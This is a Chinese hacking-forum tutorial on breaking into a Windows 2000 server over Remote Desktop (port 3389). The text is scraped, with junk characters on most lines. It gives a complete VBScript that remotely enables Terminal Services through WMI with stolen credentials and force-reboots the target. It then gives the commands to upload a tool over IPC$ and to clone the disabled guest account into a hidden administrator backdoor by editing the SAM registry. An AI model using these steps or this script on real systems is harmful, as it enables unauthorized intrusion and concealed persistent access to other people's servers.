该用户从未签到
|
一次简单的3389入侵过程
! k2 E! H5 G- q4 q原创:caozhe(草哲) ( S1 s& u. U& m r2 q, f
来源:中国欲网技术论坛--草哲 % ^8 ~6 E' k; G( L% R* \
) j* v: x$ t2 G$ ~1 M; o/ h: p' s
我在网上看到很多很多教你如何如何入侵之类的文章,我觉得对于菜鸟来说根本是看不懂的!& v* ^; E+ c' H0 I9 m& D9 j: i
0 K" _# u# k( ]8 v) W' e$ D
于是呢,我冒出个想法!想写篇简单点的,适合菜鸟的文章!把我学到的跟大家说一下~!$ o! |( @5 K1 f( T. \% q
要入侵,我建议你在win2000环境下来*作!1 T+ h5 ~. M2 e4 j8 H/ x1 G
7 ~% k# |" T$ D4 _首先,要入侵,你得有工具!我向大家推荐几款软件,也是我一直用的东西!- x5 e& U: }- O; S
扫描的X-Scan V2.3、WINNTAutoAttack、流光!
/ x# m+ x3 s1 G3 Y% t' z0 sX-Scan我最近很少用了,基本用的都是WINNTAutoAttack,当然,小榕的流光我也经常用!% w9 Z( c: q P" K$ o4 e8 i
远程开终端需要一个脚本就可以了,代码请看二楼!保存为*.vbe(我保存的是rots.vbe)5 b$ f% R; A' t0 A) t7 O
克隆帐户用个psu就可以了~!7 n0 g5 L6 X: ?0 f
3 E7 C6 ~/ b8 F( R) j7 T: D5 eOK,比如扫描到了一个有NT弱口令的服务器,IP地址是120.0.0.1,管理员帐户是administrator,密码为空2 u0 n) q) ^. Z9 z
运行CMD(2000下的DOS),我们给它开终端!
: C( k+ h% ?5 n8 O命令如下!+ Z) e$ H( a1 r; ?
cscript rots.vbe 120.0.0.1 administrator "" 3389 /fr9 x6 a, J5 ] g/ Q2 k
上面的命令应该可以理解吧?cscript rots.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为120.0.0.1这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)6 y0 B7 ]' B% _5 R. q
9 _" ]& n/ w" ?因为终端服务器只在win2000 server以上的版本(包括server)才有,PRO当然是不行的,此版本可以检测服务器的版本,如果是PRO的则提示你退出安装!
: N" M) m3 k9 v2 E7 u; d) |2 f: R# l! y
一切顺利,过会就可以连接到终端了,我们可以ping它,看是否重启,ping 120.0.0.1 -t
7 L2 R+ P3 R* k1 B8 p安装后用连接工具连接终端!现在我们克隆帐户,呵呵,为了给以后方便嘛!
' p- i4 k* c6 y3 q/ m6 k# ^: R
; N* X2 ^$ f3 o回到DOS下!我们建立IPC$连接!4 T- p! h) f: _* U+ L L
net use \\120.0.0.1\ipc$ "" /user:"administrator"
- ?. x7 b8 O8 }) s) \. g5 K! z这个命令我想应该可以理解吧!命令完成后,我们把psu上传到目标机的winnt\system32目录下!9 V0 Q! V! a2 J' ? w
copy psu.exe \\120.0.0.1\admin$\system32
" P& z4 E0 R. J; A' ~! o上传完毕后,开始在肉鸡做后门帐户!看肉鸡!3 A- I5 Y' {) h' I6 ?, ]
4 [! |4 s9 J0 y3 f0 P) i
假设guest用户被禁用,我们就是要利用guest做后门帐户!
' x& ?. p4 t K9 H0 V在该服务器运行CMD,在命令行下输入
- p1 |; [( W, o. y# p6 z/ cpsu -p regedit -i PID- s2 |8 A8 v7 [$ K- a9 [% J7 t6 j
6 k6 K8 N$ Q8 O" M, k这里解释一下,后面的PID是系统进程winlogon的值,我们在任务栏下点鼠标右键,看任务管理器!
: [& b: X9 t9 d: ~; E看进程选项卡,找到winlogon的进程,后面的数值就是winlogon的pid值,假设是5458" R: z! b6 v- ^2 E
那么,命令就是这样
2 }/ g+ b/ e5 z7 p, D/ Q0 _psu -p regedit -i 5458" x% t* [. @" L T+ f
这样直接打开注册表,可以读取本地sam的信息。
% [: M' m+ P( I' B$ }! ~* a打开键值HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
- {. [9 P( z' S* R) P. Q5 H! X3 ^下面的就是本地的用户信息了!我们要做的是把禁用的guest克隆成管理员权限的帐户!1 Y6 q m( o4 C5 c6 ~$ U
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names d. P1 B; B N9 ~8 A
查看administrator的类型,是if4,再看guest的是if54 R7 ?: I1 O4 @3 W6 Z" W* M
好了,知道了类型后,打开
8 |3 c% p) C$ E6 ^& o, zHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
1 t5 l6 E! T: k8 t+ }2 i这个值,双击右侧的F,把里面乱七八糟的字符复制下来,然后打开
, l7 h& K b3 ~0 O" V; x+ v( mHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
7 u; r& h4 h# f5 C! |双击右侧的F,把刚复制的粘贴到里面!, a3 V% z1 M! n0 p j- j) D
. i" B, u$ S' l+ ^( s做好了以后,把HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
' [4 Z, o$ C: n) m( r9 ^: E5 b0 J和HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest+ ? I# \! J! c6 x3 Q& y: A6 I
这两个键值导出,导出后把那两个键值删除!然后再导入进来!关闭注册表。: G J) b# v2 r7 b+ f% D
- R0 o0 B8 R0 r# I
打开CMD,在命令行下输入
7 O1 i) Y: ^# Q# ]! Q$ o# snet user guest password
8 b. m0 `1 A' W7 s$ G* @这条命令是给guest设置密码,后面的password就是密码
$ f8 F9 R' j6 C, ]" T然后输入1 k3 I- [% S5 G6 R0 I$ S2 X
net user guest /active:y7 `6 |! C' ]. H/ V/ D5 }
这命令是激活guest帐户,然后我们把他禁用
8 v D$ h9 }- i1 r9 S( y3 {# e. Knet user guest /active:n
9 S$ h" u9 Q+ |! A w% l上面的三行命令必须在DOS下执行!+ V, A+ z/ J Y: }) [% S: c0 s
4 B/ {9 @' W( R. V' COK了,打开计算机管理,看用户,你们看,guest帐户还是被禁用的~!哈哈,但它已经拥有管理员权限了!
* Q0 S- i: I0 J9 r: P/ C9 U7 Q而且并不在管理员组里显示,还可以登陆终端,跟administrator帐户一样的!4 y0 u; S( V- _- ~ s
" z. Y4 b2 }6 i% i- U4 F" e c注销一下,用guest登陆吧!/ q4 {" S3 I. q1 B/ e$ y4 b/ o+ s
P+ G; y* w+ K3 Z6 [; l) G打字都打累了~`!真不容易!呵呵~`希望上面的大家能看懂啊!6 R. D7 l3 T ] B3 d- i
如果还有地方不明白的话,可以问我,我知道的一定告诉大家!2 }5 ^( g% t( I+ o# c% B$ K
0 x/ T( I/ w: u: S9 R- s因为本人也是菜鸟级的,会了点东西就不知道怎么好了,呵呵~`!如果哪里有不对的,还请高手指点啊~!
% W# }* ~5 [7 S g) D6 T
4 Z4 |1 U" z6 i+ c8 N----------------------------------------------------------------------
' R+ _; Y- X9 g3 i. _7 D8 h- |以下是开终端的脚本,把它存为*.vbe. E- T" H$ y: m( v
on error resume next" M+ T0 O; i" S/ B4 r1 J. i! _7 E; E
set outstreem=wscript.stdout
" R5 n1 T' A% S. B B% l9 @set instreem=wscript.stdin
6 F' {+ j! N/ aif (lcase(right(wscript.fullname,11))="wscript.exe") then- C# o' q9 P9 K4 {
set objShell=wscript.createObject("wscript.shell"): c3 T$ h. {8 H6 @$ w( u: f
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
6 @+ j) G5 i5 z- S wscript.quit0 h1 M! [' a: k% K) z$ R. w
end if1 e$ w8 M6 z$ j: q
if wscript.arguments.count<3 then
2 R& H7 B: I: V# D8 \. f/ E usage()
7 N" N g% v" t' n* `3 z) c" r wscript.echo "Not enough parameters."; \" L5 i5 g- c0 C' [
wscript.quit
$ }. ]7 f q4 Z) k3 a7 ]. x! z kend if
$ Y! t$ P @1 r! i. i l, q' [- F. v% a. Q( X# {- G
ipaddress=wscript.arguments(0)
' i5 d1 F. \6 Gusername=wscript.arguments(1)" n1 g/ ~- L" }5 L2 t! U. g
password=wscript.arguments(2)
]( o. p; j) y* B- J `if wscript.arguments.count>3 then7 O! o4 g% B R9 x" R" `
port=wscript.arguments(3)$ ^: A% u" b' X' u6 \
else
( m, d% A9 Q- j% L3 l port=3389: i5 w& N; H4 j
end if
( n- Q3 L5 }5 H6 L! U( U4 tif not isnumeric(port) or port<1 or port>65000 then
: p7 {0 u$ ]' y: ^, U* P wscript.echo "The number of port is error."$ [1 b/ V; g8 f! {- |
wscript.quit4 \( L' [- Y9 w: T
end if
9 M6 w1 z( Y5 g8 C' [' Vif wscript.arguments.count>4 then
/ a+ i$ z0 a5 G0 f% V1 z" i reboot=wscript.arguments(4)
9 M# X: d4 L3 t1 Relse! g u; ?' I! Q* S( E5 m
reboot="". o3 I2 ^3 A; ^# F
end if
' w+ g, u, J* {
: f0 d' S0 F7 v% ?. N. u1 tusage()" k! c; G1 l9 p; u* L: T
outstreem.write "Conneting "&ipaddress&" ...."
2 j# Y; P2 Q' }0 j3 Z6 {set objlocator=createobject("wbemscripting.swbemlocator")
, u) U( z! m4 o0 y7 x& c; F. ]) Y# [set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
. I" {: w* O9 ^+ i: kshowerror(err.number)2 ]5 s, k4 ?9 [ S) l
objswbemservices.security_.privileges.add 23,true; Q9 g- N1 s, @' q( t
objswbemservices.security_.privileges.add 18,true5 B( t# v; x' \" ?8 x
3 J9 r+ l+ q; N, s3 p+ P6 W) @' n
outstreem.write "Checking OS type...."( J+ t5 I8 p; f$ s" d
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")
; D$ [5 _! `, |for each objinstoscaption in colinstoscaption
0 \; @: W9 n, G6 k, w8 k$ F/ ~ if instr(objinstoscaption.caption,"Server")>0 then
( a0 C: |& ~* n ? wscript.echo "OK!"
& z6 @( E5 U$ T& d! E$ t- b0 g else4 w9 l# [0 F+ t6 a$ C2 Z. {! ]
wscript.echo "OS type is "&objinstoscaption.caption& J; x0 N7 f$ G) D
outstreem.write "Do you want to cancel setup?[y/n]"2 X7 V) W6 c: C& I
strcancel=instreem.readline }: d5 a' p+ q* R* {0 o
if lcase(strcancel)<>"n" then wscript.quit9 Y' e6 D3 `9 f
end if- }8 ^7 _# ]& F2 D& ?0 H' C9 q
next/ E' f O. Z& T& `0 T! ?7 n( f
I) Y& @1 j" v }' u( Z- Coutstreem.write "Writing into registry ...."
" `5 M; J* L1 B) [7 Y/ O0 xset objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")7 W( r$ ?5 J- t4 {6 m( J' B* X
HKLM=&h80000002; e) P( G# ^. q, T8 s8 K
HKU=&h80000003
; z4 h& ]) P& _: U! @4 l; ~' i8 owith objinstreg7 B2 ]8 N% l9 O) z! @# ^7 u
.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"+ I( @8 }* [: _9 `& A
.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",04 u1 S K, L( g. z# J3 k- E
.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
2 J, ~; Q8 \5 M9 R2 }, x.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1) N! V3 F( {' P1 I- E! O
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1* W0 t2 l. v6 h! W" W/ S
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",28 x3 M* {3 Z" z" ^8 q8 V2 x7 H
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
* N- q+ {5 r' T- t1 R.setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
e3 l! s. v( a+ G.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port
% a% @7 }0 b' l# |+ `5 Nend with
: D! {& f! d! h! G; p1 [showerror(err.number)) S$ e! g2 q& g" K8 V8 }( K3 Z
2 B. T( }6 U. h, F1 c8 f- A
rebt=lcase(reboot)" y" S. r! ~- F& r
flag=0
4 `5 ^+ z: L) q* ]& F% kif rebt="/r" or rebt="-r" or rebt="\r" then flag=2
* I% V3 w. G2 Q- x* gif rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6
4 d. X, h5 a; B' X$ z. v3 Lif flag<>0 then7 W$ ]1 _% b$ l6 ^$ q: g+ F" r0 t
outstreem.write "Now, reboot target...."
. @# B; Q2 k) U& G {% p strwqlquery="select * from win32_operatingsystem where primary='true'", Y3 Z0 r1 R1 ^; a
set colinstances=objswbemservices.execquery(strwqlquery)5 G+ f5 ?% l1 w' z5 x* {" B
for each objinstance in colinstances2 Y' E" ]/ O& |9 s: ?5 U% K
objinstance.win32shutdown(flag)
1 Z; L* [, V5 ~ next
7 ?; y# H0 f) K! R showerror(err.number)1 i- B8 |+ F# ]& s4 e5 x* P
else" K/ r ^2 X; X( T
wscript.echo "You need to reboot target."&vbcrlf&"Then,"
0 g* W- y6 }6 Z6 C- ?0 Dend if
0 D! L# G* G" M: ]0 G# p/ ]wscript.echo "You can logon terminal services on "&port&" later. Good luck!"+ K$ I4 {; T* Q" {/ a& \ a
( u/ s. d6 Y$ e# l
function showerror(errornumber); y2 Y2 [: y4 p
if errornumber Then
6 @# N6 G+ z. C) y$ [ R( z/ s wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
1 j: J; k) t9 c9 N if err.description <> "" then/ I, | h8 R- A e5 Q, X# \+ A
wscript.echo "Error description: "&err.description&"."
" f1 P5 w3 r+ w" S end if( M2 ]2 P% ~; A* V: \
wscript.quit' i8 r$ O6 X! |
else4 `6 \2 j# B/ v# S* ^. M6 b# j$ D& W
wscript.echo "OK!"
1 T- U' f7 S6 m2 `end if
, L T6 j" O9 h8 Z& \) Dend function/ X" R% U1 Q1 ]6 Q* b0 Q& m! k
8 ?8 U: E) |1 ^function usage()
1 w- o$ k8 m! e, y; twscript.echo string(79,"*")+ _+ |8 s0 q2 m, v9 I6 ^
wscript.echo "ROTS v1.05"
: P# K, @. e0 hwscript.echo "Remote Open Terminal services Script, by 草哲"4 ?" b/ P. r6 \# G- x! [1 s
wscript.echo "Welcome to visite www.5458.net"' c7 Q+ Z! _2 s" m
wscript.echo "Usage:"
& U( m# C; U- n+ ^wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"
9 M! o# j$ m& Y, T e' O& Bwscript.echo "port: default number is 3389."6 q3 E, V' t. [ b# C" Y
wscript.echo "/r: auto reboot target."
8 r) m) }! j% b* {# ~* Lwscript.echo "/fr: auto force reboot target."
- a1 @" W9 E. |! gwscript.echo string(79,"*")&vbcrlf$ M% Q2 {7 I9 F, I0 e$ h
end function
8 h5 F& Y+ J% ~% ]7 J ; N8 ^( G- }$ z1 ]4 I4 o& c+ c
转自安全焦点 |
|